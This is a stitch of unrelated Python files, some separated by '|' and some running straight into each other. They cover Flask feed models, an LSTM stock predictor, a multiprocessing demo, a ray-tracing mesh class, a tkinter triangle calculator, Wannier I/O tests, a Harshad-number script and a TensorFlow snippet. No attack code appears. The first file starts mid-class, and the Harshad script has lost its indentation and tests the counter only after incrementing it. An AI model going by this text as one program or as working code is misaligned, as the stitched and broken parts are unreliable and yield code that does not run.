    sender = db.relationship('User', foreign_keys=[sender_id])
    topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
    topic = db.relationship('Topic')
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    question = db.relationship('Question')
    answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
    answer = db.relationship('Answer')
    @staticmethod
    def following_upvote_answer(user, sender, answer):
        """Feed: a followed user upvoted an answer."""
        home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_UPVOTE_ANSWER,
                                           HomeFeed.sender_id == sender.id,
                                           HomeFeed.answer_id == answer.id).first()
        if not home_feed:
            home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_UPVOTE_ANSWER,
                                 user_id=user.id, sender_id=sender.id, answer_id=answer.id)
            db.session.add(home_feed)
    @staticmethod
    def following_ask_question(user, sender, question):
        """Feed: a followed user asked a question."""
        home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_ASK_QUESTION,
                                           HomeFeed.sender_id == sender.id,
                                           HomeFeed.question_id == question.id).first()
        if not home_feed:
            home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_ASK_QUESTION,
                                 user_id=user.id, sender_id=sender.id, question_id=question.id)
            db.session.add(home_feed)
    @staticmethod
    def following_answer_question(user, sender, answer):
        """Feed: a followed user answered a question."""
        home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_ANSWER_QUESTION,
                                           HomeFeed.sender_id == sender.id,
                                           HomeFeed.answer_id == answer.id).first()
        if not home_feed:
            home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_ANSWER_QUESTION,
                                 user_id=user.id, sender_id=sender.id, answer_id=answer.id)
            db.session.add(home_feed)
    @staticmethod
    def following_follow_question(user, sender, question):
        """Feed: a followed user followed a question."""
        home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_FOLLOW_QUESTION,
                                           HomeFeed.sender_id == sender.id,
                                           HomeFeed.question_id == question.id).first()
        if not home_feed:
            home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_FOLLOW_QUESTION,
                                 user_id=user.id, sender_id=sender.id, question_id=question.id)
            db.session.add(home_feed)
class HomeFeedBackup(db.Model):
    """Backup of home-page feed items.

    Used to pre-populate the home feed of a newly registered user once
    they follow other users.
    """
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    kind = db.Column(db.String(50))  # one of HOME_FEED_KIND
    created_at = db.Column(db.DateTime, default=datetime.now)
    sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    sender = db.relationship('User', foreign_keys=[sender_id])
    topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
    topic = db.relationship('Topic')
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    question = db.relationship('Question')
    answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
    answer = db.relationship('Answer')
class COMPOSE_FEED_KIND(object):
    """Compose-page feed item kinds."""
    INVITE_TO_ANSWER = "kdcKRfi"  # question I was invited to answer
    WAITING_FOR_ANSWER_QUESTION_FROM_EXPERT_TOPIC = "v0KJCX3"  # unanswered question from my expert topics
    WAITING_FOR_ANSWER_QUESTION_FROM_ALL = "4Q8wfm9"  # site-wide hot unanswered question (occasional)
    WAITING_FOR_ANSWER_QUESTION_FROM_ANSWERED_TOPIC = "JlPzjXf"  # hot unanswered question from a topic I have answered in but not marked as expert
class ComposeFeed(db.Model):
    """Compose-page feed entry suggesting a question for the user to answer.

    NOTE(review): the three ``waiting_for_*`` helpers deduplicate by
    ``question_id`` only (ignoring ``kind``), so a question suggested under
    one kind is never re-suggested under another; confirm that is intended.
    """
    __bind_key__ = 'dc'
    id = db.Column(db.Integer, primary_key=True)
    kind = db.Column(db.String(50))  # one of COMPOSE_FEED_KIND
    ignore = db.Column(db.Boolean, default=False)  # user dismissed the suggestion
    answered = db.Column(db.Boolean, default=False)
    unread = db.Column(db.Boolean, default=True)
    created_at = db.Column(db.DateTime, default=datetime.now)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    user = db.relationship('User',
                           backref=db.backref('compose_feeds',
                                              lazy='dynamic',
                                              order_by='desc(ComposeFeed.created_at)'))
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    question = db.relationship('Question')
    invitation_id = db.Column(db.Integer, db.ForeignKey('invite_answer.id'))
    invitation = db.relationship('InviteAnswer')
    @staticmethod
    def invite_to_answer(user, question, invitation):
        """Compose feed: user was invited to answer a question."""
        compose_feed = user.compose_feeds.filter(ComposeFeed.kind == COMPOSE_FEED_KIND.INVITE_TO_ANSWER,
                                                 ComposeFeed.question_id == question.id,
                                                 ComposeFeed.invitation_id == invitation.id).first()
        if not compose_feed:
            compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.INVITE_TO_ANSWER, user_id=user.id,
                                       question_id=question.id, invitation_id=invitation.id)
            db.session.add(compose_feed)
    @staticmethod
    def waiting_for_answer_question_from_expert_topic(user, question):
        """Compose feed: unanswered question from one of the user's expert topics."""
        compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
        if not compose_feed:
            compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_EXPERT_TOPIC,
                                       user_id=user.id, question_id=question.id)
            db.session.add(compose_feed)
    @staticmethod
    def waiting_for_answer_question_from_all(user, question):
        """Compose feed: site-wide hot unanswered question."""
        compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
        if not compose_feed:
            compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_ALL,
                                       user_id=user.id, question_id=question.id)
            db.session.add(compose_feed)
    @staticmethod
    def waiting_for_answer_question_from_answered_topic(user, question):
        """Compose feed: hot unanswered question from a topic the user answered in before."""
        compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
        if not compose_feed:
            compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_ANSWERED_TOPIC,
                                       user_id=user.id, question_id=question.id)
            db.session.add(compose_feed)
|
# Train an LSTM to predict NSE-TATA closing prices and save the model.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import LSTM
from tensorflow.keras.layers import Dropout
from sklearn.preprocessing import MinMaxScaler
from matplotlib.pylab import rcParams

rcParams['figure.figsize'] = 20, 10

# Load the stock data and index it by date.
df = pd.read_csv("NSE-TATA.csv")
df["Date"] = pd.to_datetime(df.Date, format="%Y-%m-%d")
df.index = df['Date']

plt.figure(figsize=(16, 8))
plt.plot(df["Close"], label='Close Price history')

# Build a Date/Close-only frame sorted chronologically.
data = df.sort_index(ascending=True, axis=0)
new_dataset = pd.DataFrame(index=range(0, len(df)), columns=['Date', 'Close'])
for i in range(0, len(data)):
    new_dataset["Date"][i] = data["Date"][i]
    new_dataset["Close"][i] = data["Close"][i]
new_dataset.index = new_dataset.Date
new_dataset.drop("Date", axis=1, inplace=True)

# First 987 rows train, remainder validates.
final_dataset = new_dataset.values
train_data = final_dataset[0:987, :]
valid_data = final_dataset[987:, :]

# Scale prices to [0, 1].  (A redundant MinMaxScaler that was created and
# immediately overwritten has been removed.)
# NOTE(review): the scaler is fit on the FULL dataset, which leaks
# validation statistics into training; fit on train_data only if a strict
# evaluation is required.
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(final_dataset)

# 60-step sliding windows: predict close at t from closes at t-60..t-1.
x_train_data, y_train_data = [], []
for i in range(60, len(train_data)):
    x_train_data.append(scaled_data[i - 60:i, 0])
    y_train_data.append(scaled_data[i, 0])
x_train_data, y_train_data = np.array(x_train_data), np.array(y_train_data)
x_train_data = np.reshape(x_train_data, (x_train_data.shape[0], x_train_data.shape[1], 1))

# Stacked LSTM with dropout regularization; last LSTM returns a vector.
rnn = Sequential()
rnn.add(LSTM(units=45, return_sequences=True, input_shape=(x_train_data.shape[1], 1)))
rnn.add(Dropout(0.2))
for return_seq in [True, True, False]:
    rnn.add(LSTM(units=45, return_sequences=return_seq))
    rnn.add(Dropout(0.2))
rnn.add(Dense(units=1))
rnn.compile(optimizer='adam', loss='mean_squared_error')
rnn.fit(x_train_data, y_train_data, epochs=100, batch_size=32)

# Build validation windows (including the last 60 training points as context).
inputs_data = new_dataset[len(new_dataset) - len(valid_data) - 60:].values
inputs_data = inputs_data.reshape(-1, 1)
inputs_data = scaler.transform(inputs_data)
X_test = []
for i in range(60, inputs_data.shape[0]):
    X_test.append(inputs_data[i - 60:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))

# Predict and map back to price units, then persist the model.
predicted_closing_price = rnn.predict(X_test)
predicted_closing_price = scaler.inverse_transform(predicted_closing_price)
rnn.save("model_RNN_Close.h5")
from multiprocessing import Process, Value, Lock
import os
import time
from multiprocessing.managers import BaseManager
class User:
    """Demo object shared across processes via a BaseManager proxy."""
    def __init__(self, name, salary):
        self.name = name
        self.money = Value('f', salary)  # process-shared float
    def increase(self):
        # Add 1000 to the shared balance; sleep to make interleaving visible.
        self.money.value += 1000
        time.sleep(1)
    def __repr__(self):  # string representation of the object
        return '{} money is {}'.format(self.name, self.money.value)
class MyManager(BaseManager):
    # Custom Manager subclass; types are registered on it below.
    pass
# Register the User class with the manager so proxies can be created.
MyManager.register("User", User)
def Manager():  # factory that creates and starts a MyManager instance
    m = MyManager()
    m.start()  # a BaseManager must be started before use
    return m
def f(user, lock):
    """Worker: atomically increase the shared balance and print it."""
    with lock:
        user.increase()
        print(os.getpid(), '子进程', user)
if __name__ == '__main__':
    manager = Manager()  # cross-process data manager
    user = manager.User('disen', 100)  # User proxy managed by the manager
    lock = Lock()
    # Five processes all run f, sharing the same User proxy and lock.
    procs = [Process(target=f, args=(user, lock)) for i in range(5)]
    for proc in procs:
        proc.start()
    for proc in procs:
        proc.join()
    print('主进程', os.getpid(), user)
|
from pymongo import MongoClient
import datetime
# Connect to a local MongoDB instance and prepare a sample document.
client = MongoClient('localhost', 27017)
db = client['test-database']
collection = db['test-collection']
# NOTE(review): ``post`` is built but never inserted (no insert_one call);
# ``datetime.utcnow()`` is also deprecated since Python 3.12 — consider
# ``datetime.now(timezone.utc)``.
post = {"author": "Mike",
        "text": "My first blog post!",
        "tags": ["mongodb", "python", "pymongo"],
        "date": datetime.datetime.utcnow()}
posts = db["posts"]
import platform
from ..base import Ray, Vector3
from ..macros import create_assembler
from .hit import HitPoint
from .shape import Shape
from .grid_mesh import GridMesh
from .ray_triangle import ray_triangle_intersection
class BaseMesh(Shape):
    """Abstract triangle-mesh shape.

    Concrete subclasses supply vertex/normal/uv storage via the abstract
    accessors; this base class implements ray/triangle intersection in
    Python and wires up the assembly fast paths.
    """
    def ntriangles(self):
        """Number of triangles in the mesh."""
        raise NotImplementedError()
    def bbox_triangle(self, idx):
        """Bounding box of triangle *idx*."""
        raise NotImplementedError()
    def isect_triangles(self, ray, triangles, min_dist=999999.0):
        """Intersect *ray* with the given triangle indices.

        Returns the nearest HitPoint closer than *min_dist*, or False.
        """
        hit_point = False
        for idx in triangles:
            hit = self.ray_triangle(ray, idx, min_dist)
            if hit is False: continue
            if hit.t < min_dist:
                min_dist = hit.t
                hit_point = hit
        return hit_point
    def get_point(self, idx):
        """Vertex position *idx* as an indexable (x, y, z)."""
        raise NotImplementedError()
    def get_normal(self, idx):
        """Vertex normal *idx* as an indexable (x, y, z)."""
        raise NotImplementedError()
    def get_indices(self, idx):
        """Vertex indices (v0, v1, v2) of triangle *idx*."""
        raise NotImplementedError()
    def get_uv(self, idx):
        """Texture coordinates (u, v) of vertex *idx*."""
        raise NotImplementedError()
    @classmethod
    def has_normals(cls):
        """Whether the mesh stores per-vertex normals."""
        raise NotImplementedError()
    @classmethod
    def has_uv(cls):
        """Whether the mesh stores per-vertex uv coordinates."""
        raise NotImplementedError()
    def ray_triangle(self, ray, idx, min_dist = 999999.0):
        """Intersect *ray* with triangle *idx*.

        Solves the barycentric system with determinants: ``beta`` and
        ``gamma`` are the barycentric coordinates and ``t`` the ray
        parameter.  Returns a HitPoint or False on a miss.  Normals are
        interpolated when available, otherwise the geometric normal is
        used; same for uv coordinates.
        """
        v0, v1, v2 = self.get_indices(idx)
        p0 = self.get_point(v0)
        p1 = self.get_point(v1)
        p2 = self.get_point(v2)
        a = p0[0] - p1[0]
        b = p0[0] - p2[0]
        c = ray.dir.x
        d = p0[0] - ray.origin.x
        e = p0[1] - p1[1]
        f = p0[1] - p2[1]
        g = ray.dir.y
        h = p0[1] - ray.origin.y
        i = p0[2] - p1[2]
        j = p0[2] - p2[2]
        k = ray.dir.z
        l = p0[2] - ray.origin.z
        m = f * k - g * j
        n = h * k - g * l
        p = f * l - h * j
        q = g * i - e * k
        s = e * j - f * i
        temp3 = (a * m + b * q + c * s)
        if temp3 == 0.0: return False  # ray parallel to the triangle plane
        inv_denom = 1.0 / temp3
        e1 = d * m - b * n - c * p
        beta = e1 * inv_denom
        if beta < 0.0: return False
        r = e * l - h * i
        e2 = a * n + d * q + c * r
        gamma = e2 * inv_denom
        if gamma < 0.0: return False
        if beta + gamma > 1.0: return False
        e3 = a * p - b * r + d * s
        t = e3 * inv_denom
        if t < 0.0001: return False # self-intersection
        hit_point = ray.origin + ray.dir * t
        if self.has_normals():
            # Interpolate the stored vertex normals barycentrically.
            n0 = self.get_normal(v0)
            n1 = self.get_normal(v1)
            n2 = self.get_normal(v2)
            normal0 = Vector3(n0[0], n0[1], n0[2])
            normal1 = Vector3(n1[0], n1[1], n1[2])
            normal2 = Vector3(n2[0], n2[1], n2[2])
            normal = normal0 * (1.0 - beta - gamma) + beta * normal1 + gamma * normal2
            normal.normalize()
        else:
            # Geometric (face) normal from the edge cross product.
            normal0 = Vector3(p0[0], p0[1], p0[2])
            normal1 = Vector3(p1[0], p1[1], p1[2])
            normal2 = Vector3(p2[0], p2[1], p2[2])
            normal = (normal1 - normal0).cross(normal2 - normal0)
            normal.normalize()
        u = v = 0.0
        if self.has_uv():
            uv0 = self.get_uv(v0)
            uv1 = self.get_uv(v1)
            uv2 = self.get_uv(v2)
            u = uv0[0] * (1.0 - beta - gamma) + beta * uv1[0] + gamma * uv2[0]
            v = uv0[1] * (1.0 - beta - gamma) + beta * uv1[1] + gamma * uv2[1]
        return HitPoint(t, hit_point, normal, self.material_idx, u=u, v=v)
    # eax = pointer to ray structure
    # ebx = pointer to flat mesh structure
    # ecx = pointer to minimum distance
    # edx = pointer to hitpoint
    @classmethod
    def isect_asm(cls, runtimes, label):
        """Assemble and register the full-hitpoint intersection routine."""
        lbl_name = "ray_tri" + str(id(cls))
        cls.isect_triangles_asm(runtimes, lbl_name)
        GridMesh.isect_asm(runtimes, label, cls.asm_struct_name(),
                           cls.asm_struct(), lbl_name, uv=cls.has_uv())
    # eax = pointer to ray structure
    # ebx = pointer to flat mesh structure
    # ecx = pointer to minimum distance
    @classmethod
    def isect_asm_b(cls, runtimes, label):
        """Assemble and register the visibility-only intersection routine."""
        lbl_name = "ray_tri_b" + str(id(cls))
        cls.isect_triangles_asm_b(runtimes, lbl_name)
        GridMesh.isect_asm(runtimes, label, cls.asm_struct_name(), cls.asm_struct(), lbl_name, visibility=True)
    @classmethod
    def ray_triangle_isect_asm(cls, runtimes, prefix):
        """Assemble the single ray/triangle kernel once per runtime; return its label."""
        assembler = create_assembler()
        ray_isect_label = prefix + str(id(cls))
        code = ray_triangle_intersection(ray_isect_label)
        for r in runtimes:
            if not r.global_exists(ray_isect_label):
                mc = assembler.assemble(code, True)
                r.load(ray_isect_label, mc)
        return ray_isect_label
    @classmethod
    def epsilon(cls):
        """Minimum hit distance used to reject self-intersections."""
        return 0.0005
    # eax, rax = pointer to ray structure
    # ebx, rbx = pointer to flat mesh structure
    # ecx, rcx = pointer to minimum distance
    # edx, rdx = address in linear grid array --- n:idx1, idx2, ...
    @classmethod
    def isect_triangles_asm(cls, runtimes, label):
        """Assemble the triangle-list intersection loop (32- or 64-bit)."""
        bits = platform.architecture()[0]
        bit64 = True if bits == "64bit" else False
        ray_isect_label = cls.ray_triangle_isect_asm(runtimes, "ray_triangle_isect")
        if bit64:
            code = cls.isect_triangles_asm_64(label, ray_isect_label)
        else:
            code = cls.isect_triangles_asm_32(label, ray_isect_label)
        assembler = create_assembler()
        mc = assembler.assemble(code, True)
        #mc.print_machine_code()
        name = "ray_triangles_isects" + str(id(cls))
        for r in runtimes:
            # NOTE(review): the existence check uses ``label`` while the
            # code is loaded under ``name`` -- these never match, so the
            # guard looks ineffective; confirm which symbol is intended.
            if not r.global_exists(label):
                r.load(name, mc)
    @classmethod
    def isect_triangles_asm_32(cls, label, ray_isect_label):
        """32-bit triangle-list loop; provided by subclasses."""
        raise NotImplementedError()
    @classmethod
    def isect_triangles_asm_64(cls, label, ray_isect_label):
        """64-bit triangle-list loop; provided by subclasses."""
        raise NotImplementedError()
    # eax = pointer to ray structure
    # ebx = pointer to flat mesh structure
    # ecx = pointer to minimum distance
    # edx = address in linear grid array --- n:idx1, idx2, ...
    @classmethod
    def isect_triangles_asm_b(cls, runtimes, label):
        """Assemble the visibility-only triangle-list loop (32- or 64-bit)."""
        bits = platform.architecture()[0]
        bit64 = True if bits == "64bit" else False
        ray_isect_label = cls.ray_triangle_isect_asm(runtimes, "ray_triangle_isect")
        if bit64:
            code = cls.isect_triangles_asm_b_64(label, ray_isect_label)
        else:
            code = cls.isect_triangles_asm_b_32(label, ray_isect_label)
        assembler = create_assembler()
        mc = assembler.assemble(code, True)
        #mc.print_machine_code()
        name = "ray_triangles_isects_b" + str(id(cls))
        for r in runtimes:
            # NOTE(review): same ``label`` vs ``name`` mismatch as in
            # isect_triangles_asm above.
            if not r.global_exists(label):
                r.load(name, mc)
    @classmethod
    def isect_triangles_asm_b_32(cls, label, ray_isect_label):
        """32-bit visibility-only loop; provided by subclasses."""
        raise NotImplementedError()
    @classmethod
    def isect_triangles_asm_b_64(cls, label, ray_isect_label):
        """64-bit visibility-only loop; provided by subclasses."""
        raise NotImplementedError()
    def __getstate__(self):
        # Meshes are not pickled with their data; return an empty state.
        return {}
    def translate(self, dx, dy, dz):
        """Translate the mesh; no-op in the base class."""
        pass
    def scale(self, sx, sy, sz):
        """Scale the mesh; no-op in the base class.

        BUG FIX: this was a second ``translate`` definition (with scale-like
        parameters sx/sy/sz) that silently shadowed the real ``translate``
        above; renamed to ``scale``.
        """
        pass
    def prepare(self, performanse=False):
        """Prepare acceleration structures; no-op in the base class.

        NOTE(review): parameter name ``performanse`` is a typo for
        "performance" but is kept for any keyword callers.
        """
        pass
|
from math import sqrt
from tkinter import *
def triangle_w():
    """Open the main Triangle window with buttons for each calculator."""
    global triangle_main
    triangle_main=Tk()
    triangle_main.title("Triangle")
    # Pythagorean-theorem calculator
    pytago=Button(triangle_main,text="Square",command=pytago_w,fg="green")
    pytago.pack()
    # area = edge * height / 2
    Normal_area=Button(triangle_main,text="Normal area",fg="green",command=triangle_normal)
    Normal_area.pack()
    # perimeter = a + b + c
    Normal_per=Button(triangle_main,text="Normal Perimeter",fg="green",command=triangle_normal_per)
    Normal_per.pack()
    close=Button(triangle_main,text="Close",command=close_triangle_m)
    close.pack()
def close_triangle_m():
    # Destroy the main Triangle window.
    triangle_main.destroy()
def pytago_w():
    """Open the Pythagorean window with entries for the three edges.

    The user writes 0 in the edge to be computed; start_pytago reads the
    entries via the globals a1/b1/c1.
    """
    global pytago_main
    global a1,b1,c1
    pytago_main=Tk()
    pytago_main.title("Square")
    pytago_main.geometry("600x400")
    note=Label(pytago_main,text="Choose your edge to calculate by write a choosen edge number 0")
    note.grid(row=0,column=0)
    a=Label(pytago_main,text="AB=")
    a.grid(row=1,column=0)
    a1=Entry(pytago_main,width=5)
    a1.grid(row=1,column=1)
    b=Label(pytago_main,text="AC=")
    b.grid(row=2,column=0)
    b1=Entry(pytago_main,width=5)
    b1.grid(row=2,column=1)
    c=Label(pytago_main,text="BC=")
    c.grid(row=3,column=0)
    c1=Entry(pytago_main,width=5)
    c1.grid(row=3,column=1)
    start=Button(pytago_main,text="Start",command=start_pytago)
    start.grid(row=4,column=0)
    # NOTE(review): the Close button and the result label both use
    # row=5, column=0, so the result overlaps the button when shown.
    close=Button(pytago_main,text="Close",command=close_win)
    close.grid(row=5,column=0)
def close_win():
    # Destroy the Pythagorean window.
    pytago_main.destroy()
def start_pytago():
    """Solve the Pythagorean relation for the edge the user marked with 0.

    Reads the three entries (globals a1/b1/c1 from pytago_w), treats BC as
    the hypotenuse, and shows the missing edge as a label.

    BUG FIX: the original code called ``sqrt`` without importing it
    (``from tkinter import *`` does not provide it), so every branch
    raised NameError at runtime; ``from math import sqrt`` is now
    imported at the top of the file.

    NOTE(review): if none of the entries is 0, nothing is displayed; and
    the result label shares grid row 5 with the Close button.
    """
    ab = int(a1.get())
    ac = int(b1.get())
    bc = int(c1.get())
    if ab == 0:
        ans = sqrt((bc ** 2) - (ac ** 2))
        ans2 = Label(pytago_main, text="AB=" + str(ans))
        ans2.grid(row=5, column=0)
    elif ac == 0:
        ans = sqrt((bc ** 2) - (ab ** 2))
        ans2 = Label(pytago_main, text="AC=" + str(ans))
        ans2.grid(row=5, column=0)
    elif bc == 0:
        ans = sqrt((ab ** 2) + (ac ** 2))
        ans2 = Label(pytago_main, text="BC=" + str(ans))
        ans2.grid(row=5, column=0)
def triangle_normal():
    """Open the triangle-area window (area = edge * height / 2)."""
    global pytago_main
    global Edge1,Height1
    pytago_main=Tk()
    pytago_main.title("Normal")
    pytago_main.geometry("700x400")
    lab=Label(pytago_main,text="Normal (area)")
    lab.grid(row=0,column=0)
    Edge=Label(pytago_main,text="Edge=")
    Edge.grid(row=1,column=0)
    Edge1=Entry(pytago_main,width=20)
    Edge1.grid(row=1,column=1)
    Height=Label(pytago_main,text="Height=")
    Height.grid(row=2,column=0)
    Height1=Entry(pytago_main,width=20)
    Height1.grid(row=2,column=1)
    But=Button(pytago_main,text="Start area",command=start_normal_area)
    But.grid(row=3,column=0)
    # NOTE(review): the result label in start_normal_area uses row=4,
    # which overlaps this Close button.
    Close=Button(pytago_main,text="CLose",command=close_normal_area)
    Close.grid(row=4,column=0)
def start_normal_area():
    """Compute the area (edge * height / 2) and display it as a label."""
    edge2=Edge1.get()
    height2=Height1.get()
    height3=int(height2)
    edge3=int(edge2)
    ans=(height3*edge3)/2
    ans1=Label(pytago_main,text="The answer is: "+str(ans))
    ans1.grid(row=4,column=0)
def close_normal_area():
    # Destroy the area/perimeter window.
    pytago_main.destroy()
def triangle_normal_per():
    """Open the triangle-perimeter window (perimeter = a + b + c)."""
    global pytago_main
    global a,b,c
    pytago_main=Tk()
    pytago_main.title("Perimeter")
    pytago_main.geometry("700x400")
    lab=Label(pytago_main,text="Normal (perimeter)")
    lab.grid(row=0,column=0)
    a1=Label(pytago_main,text="a=")
    a1.grid(row=1,column=0)
    a=Entry(pytago_main,width=30)
    a.grid(row=1,column=1)
    b1=Label(pytago_main,text="b=")
    b1.grid(row=2,column=0)
    b=Entry(pytago_main,width=30)
    b.grid(row=2,column=1)
    c1=Label(pytago_main,text="c=")
    c1.grid(row=3,column=0)
    c=Entry(pytago_main,width=30)
    c.grid(row=3,column=1)
    But=Button(pytago_main,text="Start perimeter",command=start_normal_per)
    But.grid(row=4,column=0)
    Close=Button(pytago_main,text="CLose",command=close_normal_area)
    Close.grid(row=5,column=0)
def start_normal_per():
    """Compute the perimeter (a + b + c) and display it as a label."""
    a2=a.get()
    b2=b.get()
    c2=c.get()
    a3=int(a2)
    b3=int(b2)
    c3=int(c2)
    ans=a3+b3+c3
    ans1=Label(pytago_main,text="The answer is: "+str(ans))
    ans1.grid(row=6,column=0)
|
from jarvis.io.wannier.outputs import (
WannierHam,
Wannier90wout,
Wannier90eig,
get_projectors_for_formula,
get_orbitals,
)
import os
import tempfile
from jarvis.core.kpoints import generate_kgrid
from jarvis.io.vasp.inputs import Poscar
import matplotlib.pyplot as plt
plt.switch_backend("agg")
# Test fixtures: paths to the bundled wannier90 output files and a POSCAR
# structure shipped alongside the test suite.
new_file, filename = tempfile.mkstemp()
atoms = Poscar.from_file(
    os.path.join(
        os.path.dirname(__file__),
        "..",
        "..",
        "analysis",
        "structure",
        "POSCAR",
    )
).atoms
wann_soc_win_hr = os.path.join(os.path.dirname(__file__), "wannier90_hr.dat")
wann_wout = os.path.join(os.path.dirname(__file__), "wannier90.wout")
wann_eig = os.path.join(os.path.dirname(__file__), "wannier90.eig")
soc_scfband_vrun = os.path.join(
    os.path.dirname(__file__), "vasprun.xml"
)  # for JVASP-1067
def test_outputs_bi2se3():
    """End-to-end smoke test of the Wannier I/O helpers.

    Exercises projector/orbital lookup, WannierHam parsing, comparison with
    DFT bands, DOS, supercell generation, band-structure plotting and the
    topology helpers, then checks a handful of scalar results.

    NOTE(review): the name says bi2se3 but the projector example below uses
    a CrI3-like formula while the final assert expects "Bi" — presumably the
    HR fixture is the Bi2Se3 system; confirm against the test data files.
    """
    pp = get_projectors_for_formula(formula_dict={"Cr": 1, "I": 3})[0]
    orb = get_orbitals()[0]
    # Orbital selection from an explicit projection table: Cr d, then Cr s.
    x = get_orbitals(
        projection_info=[["Cr", 4, ["s", "d"]], ["I", 3, ["s", "p"]]],
        desired_orbitals=[["Cr", "d"]],
    )
    print(x)
    x = get_orbitals(
        projection_info=[["Cr", 4, ["s", "d"]], ["I", 3, ["s", "p"]]],
        desired_orbitals=[["Cr", "s"]],
    )
    print(x)
    # Parse the real-space Hamiltonian and compare its bands against VASP.
    w = WannierHam(filename=wann_soc_win_hr)
    new_file, filename = tempfile.mkstemp()
    comp = w.compare_dft_wann(
        vasprun_path=soc_scfband_vrun, plot=True, filename=filename + ".png"
    )
    maxdiff = comp["maxdiff"]
    # Round-trip the Hamiltonian through its dict serialization.
    info = w.to_dict()
    dd = WannierHam.from_dict(info)
    pp = get_projectors_for_formula()[0][0]
    # print("getorbs", pp)
    kpoints = generate_kgrid([5, 5, 5])
    energies, dos, pdos = w.dos(kpoints)
    orb = get_orbitals()[0]
    big = w.generate_supercell([2, 2, 2])
    pp = get_projectors_for_formula()
    x = get_orbitals()
    new_file, filename = tempfile.mkstemp()
    # print(pp, orb)
    w.get_bandstructure_plot(atoms=atoms, filename=filename)
    # print (x,pp)
    # Topology helpers on deliberately coarse grids (smoke test only).
    w.find_nodes(nk1=1,nk2=1,nk3=1)
    w.fermi_surf_2d(nk1=1,nk2=1)
    w.chern_number_simple()
    # print (round(dos[75],3))
    assert (
        round(maxdiff, 2),
        round(dos[75], 3),
        pp[0][0],
        orb,
        w.nwan,
        big.nwan,
    ) == (0.12, 3.02, "Bi", 1, 40, 320,)
def test_wann_cent():
    """The wannier90.wout fixture should contain exactly 40 Wannier centres."""
    wout_parser = Wannier90wout(wout_path=wann_wout)
    centers = wout_parser.give_wannier_centers()
    assert len(centers) == 40
def test_wann_eig():
    """Smoke-test Wannier90eig parsing of the wannier90.eig fixture.

    Fix: the function was named ``wann_eig``, which rebound the module-level
    ``wann_eig`` path variable to the function object itself — the call
    below would therefore have passed the function, not the file path, to
    Wannier90eig. The old name also kept pytest from collecting it.
    """
    eigs = Wannier90eig(wann_eig)
    eigs.give_wannier_eigs()
    eigs.neigs()
    eigs.nk()
# test_outputs_cri3()
# test_wann_cent()
|
# Harshad number:
# take any number, sum its decimal digits, and check whether the number
# is divisible by that digit sum. If it is divisible, it is a Harshad
# number; otherwise it is not.
# For example: 43 -> 4+3=7, and 43 is not divisible by 7,
# so 43 is not a Harshad number.
# num=int(input("enter a number "))
# i=0
# while i<1:
# a=num%10
# b=(num//10)%10
# c=(num//10)//10
# d=a+b+c
# i=i+1
# if num%d==0:
# print("harshad number")
# else:
# print("not harshad number")
i=1
while i<1000:
a=i%10
b=(i//10)%10
c=(i//10)//10
d=a+b+c
i=i+1
if i%d==0:
print("harshad number",i)
else:
print("not harshad number",i) |
import Layers
import DataSets as ds
import numpy as np
import tensorflow as tf
#############################################################################
# TF1-style device-placement smoke test: build a tiny 2x3 @ 3x2 matmul graph
# and run it with log_device_placement=True so TensorFlow prints which
# device (CPU/GPU) each op was assigned to.
a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
c = tf.matmul(a, b)
# Creates a session with log_device_placement set to True.
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# Runs the op and prints the 2x2 product.
print(sess.run(c))
################################################################################
################################################################################
################################################################################
#define a get_dict function to extract next training batch in training mode
def get_dict(database, IsTrainingMode):
    """Build a feed_dict for one training step from `database`'s next batch."""
    batch_images, batch_labels = database.NextTrainingBatch()
    # x, y_desired and ITM are the module-level graph placeholders.
    return {x: batch_images, y_desired: batch_labels, ITM: IsTrainingMode}
# When True, restore weights from ./model.ckpt instead of training fresh.
LoadModel = False
# Keep-probability used by the dropout layers (1.0 would disable dropout).
KeepProb_Dropout = 0.9
# Experiment name encodes the dropout setting; used for summaries/TensorBoard.
experiment_name = '10k_Dr%.3f'%KeepProb_Dropout
#train = ds.DataSet('../DataBases/data_1k.bin','../DataBases/gender_1k.bin',1000)
